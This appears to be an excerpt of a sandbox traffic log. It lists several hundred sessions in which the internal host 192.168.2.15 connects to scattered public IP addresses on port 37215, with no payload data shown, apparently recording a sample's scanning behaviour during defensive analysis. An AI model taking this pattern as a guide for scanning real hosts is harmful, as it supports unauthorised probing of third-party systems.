                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3229192.168.2.1545224157.178.29.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3230192.168.2.155651641.231.197.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3231192.168.2.155449841.127.248.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3232192.168.2.1538760104.205.181.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3233192.168.2.1547862155.75.171.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3234192.168.2.155194241.118.142.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3235192.168.2.1539010197.129.115.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3236192.168.2.154775841.227.165.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3237192.168.2.1559822157.111.168.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3238192.168.2.1534170136.176.36.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3239192.168.2.1554964197.92.67.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3240192.168.2.1538374197.224.45.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3241192.168.2.1546604157.11.124.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3242192.168.2.155336241.135.108.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3243192.168.2.154074841.11.172.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3244192.168.2.1538850157.130.225.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3245192.168.2.153479041.176.18.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3246192.168.2.155239441.223.48.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3247192.168.2.153563441.112.131.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3248192.168.2.155953041.112.241.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3249192.168.2.155714690.251.145.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3250192.168.2.154077625.118.190.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3251192.168.2.1549382197.33.166.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3252192.168.2.1558812197.149.188.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3253192.168.2.1554354157.189.173.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3254192.168.2.1540890197.165.52.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3255192.168.2.1545882189.174.97.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3256192.168.2.155956041.245.93.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3257192.168.2.155811491.56.121.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3258192.168.2.155954212.134.231.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3259192.168.2.153473441.157.0.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3260192.168.2.153712841.106.241.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3261192.168.2.1540566197.107.148.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3262192.168.2.154069241.81.133.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3263192.168.2.155453041.202.143.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3264192.168.2.1560586212.102.186.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3265192.168.2.1535354197.250.14.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3266192.168.2.1555746157.85.186.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3267192.168.2.1555076147.178.112.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3268192.168.2.1536402197.105.247.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3269192.168.2.155920823.166.60.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3270192.168.2.156034084.105.208.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3271192.168.2.1537134197.132.196.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3272192.168.2.153965041.92.116.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3273192.168.2.1542050157.251.70.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3274192.168.2.1548638197.238.108.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3275192.168.2.155748441.162.2.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3276192.168.2.155041841.223.104.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3277192.168.2.1545944157.174.215.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3278192.168.2.1535686197.138.180.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3279192.168.2.1560790157.41.22.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3280192.168.2.154770841.49.125.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3281192.168.2.153949041.80.152.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3282192.168.2.1556994197.201.214.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3283192.168.2.154398678.154.144.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3284192.168.2.1558566157.57.212.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3285192.168.2.154446841.108.153.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3286192.168.2.155421041.224.47.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3287192.168.2.1536748157.0.35.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3288192.168.2.1547802197.82.142.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3289192.168.2.1534086120.119.60.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3290192.168.2.1555536197.148.149.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3291192.168.2.154380041.138.127.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3292192.168.2.1540786197.92.247.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3293192.168.2.1545442157.217.160.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3294192.168.2.154567041.205.6.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3295192.168.2.1558674197.111.164.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3296192.168.2.1557322157.57.81.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3297192.168.2.155010841.209.155.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3298192.168.2.1548212197.189.130.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3299192.168.2.154209459.111.219.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3300192.168.2.1541954157.167.132.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3301192.168.2.1548550197.189.213.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3302192.168.2.1559408131.75.91.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3303192.168.2.1557074157.201.100.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3304192.168.2.1554090157.74.118.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3305192.168.2.1539976157.50.185.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3306192.168.2.1536706205.12.47.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3307192.168.2.154144441.204.113.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3308192.168.2.1552680197.141.158.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3309192.168.2.1537460157.103.88.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3310192.168.2.1545130157.37.210.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3311192.168.2.1556106197.66.58.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3312192.168.2.155633276.64.175.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3313192.168.2.1554246157.172.44.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3314192.168.2.1554590197.94.110.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3315192.168.2.155486241.185.98.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3316192.168.2.1534190157.224.190.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3317192.168.2.1533540219.100.83.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3318192.168.2.154016041.161.108.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3319192.168.2.1554430131.53.183.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3320192.168.2.1545668197.71.35.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3321192.168.2.1549718157.231.247.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3322192.168.2.1551566168.237.71.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3323192.168.2.1538678157.140.59.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3324192.168.2.154146662.240.171.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3325192.168.2.155835038.105.88.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3326192.168.2.154814041.112.176.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3327192.168.2.1554710197.173.46.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3328192.168.2.1549772157.103.207.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3329192.168.2.155148241.252.230.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3330192.168.2.1546772157.92.239.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3331192.168.2.1552702197.75.1.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3332192.168.2.155437241.183.190.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3333192.168.2.1537012197.187.184.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3334192.168.2.1540836157.165.154.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3335192.168.2.1542164187.103.120.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3336192.168.2.1556242193.57.203.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3337192.168.2.1556530197.22.1.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3338192.168.2.1548334157.50.48.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3339192.168.2.155837841.73.118.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3340192.168.2.155511051.77.67.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3341192.168.2.154880841.163.181.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3342192.168.2.153290882.85.212.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3343192.168.2.154455898.191.119.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3344192.168.2.155163441.155.225.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3345192.168.2.1547876197.48.195.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3346192.168.2.1555064197.55.14.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3347192.168.2.1549176157.237.127.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3348192.168.2.153809041.188.238.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3349192.168.2.1554302197.49.175.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3350192.168.2.153560099.25.92.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3351192.168.2.155809241.255.48.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3352192.168.2.1553922157.102.123.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3353192.168.2.1556174216.41.175.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3354192.168.2.1546554157.100.228.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3355192.168.2.154249241.209.4.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3356192.168.2.1551030157.91.209.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3357192.168.2.155428232.237.172.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3358192.168.2.1544468157.27.60.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3359192.168.2.1551086197.212.26.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3360192.168.2.1548456157.172.90.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3361192.168.2.1553944184.192.103.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3362192.168.2.1550554197.50.204.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3363192.168.2.153469887.45.134.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3364192.168.2.1542736197.249.92.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3365192.168.2.1546464157.241.66.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3366192.168.2.154170241.195.78.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3367192.168.2.154494018.50.79.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3368192.168.2.154489241.104.168.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3369192.168.2.1550798210.253.152.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3370192.168.2.1553732197.22.53.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3371192.168.2.1547070157.249.67.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3372192.168.2.154026441.17.228.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3373192.168.2.154553817.225.80.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3374192.168.2.1534160157.246.64.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3375192.168.2.153728641.254.148.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3376192.168.2.153597841.5.192.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3377192.168.2.153540692.58.192.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3378192.168.2.1557186217.41.36.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3379192.168.2.1555452197.66.233.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3380192.168.2.1534032157.216.96.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3381192.168.2.155415241.177.124.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3382192.168.2.154067241.141.116.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3383192.168.2.1555546154.116.223.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3384192.168.2.1543660217.165.210.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3385192.168.2.154675041.242.245.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3386192.168.2.154622841.39.33.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3387192.168.2.1533038197.110.77.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3388192.168.2.1541864197.91.126.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3389192.168.2.1537404157.9.200.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3390192.168.2.1553088197.24.101.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3391192.168.2.1539232125.191.92.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3392192.168.2.1546368197.240.224.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3393192.168.2.15448165.180.231.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3394192.168.2.1542790157.210.249.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3395192.168.2.1555368197.39.110.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3396192.168.2.1542134178.139.215.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3397192.168.2.155375841.152.5.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3398192.168.2.1557544197.193.190.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3399192.168.2.155943441.110.132.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3400192.168.2.1537854160.19.140.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3401192.168.2.1554436157.136.204.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3402192.168.2.1552294157.187.192.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3403192.168.2.1553158157.244.194.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3404192.168.2.155127641.39.179.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3405192.168.2.155636841.111.76.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3406192.168.2.155684241.50.255.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3407192.168.2.1560496188.172.85.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3408192.168.2.1541608191.33.17.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3409192.168.2.1555792197.180.121.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3410192.168.2.1560922207.108.100.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3411192.168.2.1538646157.101.201.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3412192.168.2.155694020.203.135.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3413192.168.2.154622841.157.183.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3414192.168.2.1549356197.235.43.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3415192.168.2.1540450157.17.161.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3416192.168.2.155373641.78.101.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3417192.168.2.1536254157.74.139.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3418192.168.2.1540252166.39.96.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3419192.168.2.154202241.38.227.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3420192.168.2.1538030157.42.78.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3421192.168.2.154307641.50.63.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3422192.168.2.1546378157.76.117.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3423192.168.2.15571241.189.144.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3424192.168.2.154286441.160.86.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3425192.168.2.1555806197.21.60.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3426192.168.2.1537382157.2.162.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3427192.168.2.1552270157.47.78.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3428192.168.2.1553748187.141.25.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3429192.168.2.1555112157.234.226.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3430192.168.2.15509608.239.206.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3431192.168.2.1541454197.84.116.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3432192.168.2.1533348157.139.74.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3433192.168.2.1556190197.188.250.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3434192.168.2.1532836148.97.50.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3435192.168.2.153447041.59.98.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3436192.168.2.1550652197.109.58.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3437192.168.2.1544784198.127.75.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
